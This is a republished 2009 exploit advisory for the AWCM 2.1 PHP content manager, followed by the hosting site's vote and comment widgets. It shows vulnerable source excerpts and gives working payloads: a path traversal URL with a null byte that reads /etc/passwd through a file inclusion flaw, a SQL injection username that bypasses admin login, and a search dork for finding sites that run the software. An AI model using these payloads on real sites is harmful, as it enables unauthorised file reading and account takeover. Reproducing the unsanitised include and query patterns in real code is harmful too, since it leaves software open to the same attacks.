AWCM 2.1 Local File Inclusion / Auth Bypass Vulnerabilities

2009-09-17 / 2009-09-18
Credit: SwEET-DeViL
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89
CWE-22

---------------------------------AWCM v2.1 (LFI/Auth Bypass) Vulnerabilities--------------------------------------- # # #### # ### ## ### #### #### ### ##### #### #### ### # ### #### ###### ## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ### # # ### # # ## ### ### # # # # ### ## # # # ### # #### # # #### # # ###### # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ## # # # # # # # ## # # ## ##### ## ###### ### ### #### ### # # ### #### #### ### # ### # #### ### #---------------------------------------------------------------------------------------------------------------- Script : AWCM version : v2.1 Language:PHP Demo : http://awcm.sourceforge.net/ Download : http://awcm.sourceforge.net/ar/down_pro.php?id=30 Dork: intext:Powered by AWCM v2.1 Found by :SwEET-DeViL need magic_quotes_gpc = Off #---------------------------------------------------------------------------------------------------------------- ::: Local File Disclosure Vulnerability ::: )=> a.php ................................................................................................................. if (isset($_GET['a'])) { $a = $_GET['a']; <======================================:{ if (file_exists("addons/$a/index.php")) { include ("addons/$a/index.php"); } ................................................................................................................. #Exploit: http://www.site.com/a.php?a=../../../../../../../../etc/passwd%00 ############################################################################## ::: Auth Bypass SQL Injection Vulnerability ::: )=> login.php AND control/login.php ................................................................................................................. if(isset($_GET['do'])) { $user = $_POST['username']; <======================================:{ $pass = md5($_POST['password']); $cp_login_query = mysql_query("SELECT id,username,password,level FROM awcm_members WHERE level = 'admin' AND username = '$user' AND password = '$pass'"); ................................................................................................................. #Exploit: put as username : 'or 1=1/* ############################################################################## www.arab4services.net /---------------------------------------------------\ |+------------------------------------------------+ | || SwEET-DeViL & viP HaCkEr | | || gamr-14(at)hotmail.com | | |+------------------------------------------------+ | \---------------------------------------------------/

Referencje:

http://xforce.iss.net/xforce/xfdb/51979
http://www.milw0rm.com/exploits/9237
http://secunia.com/advisories/35955
http://osvdb.org/56336


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top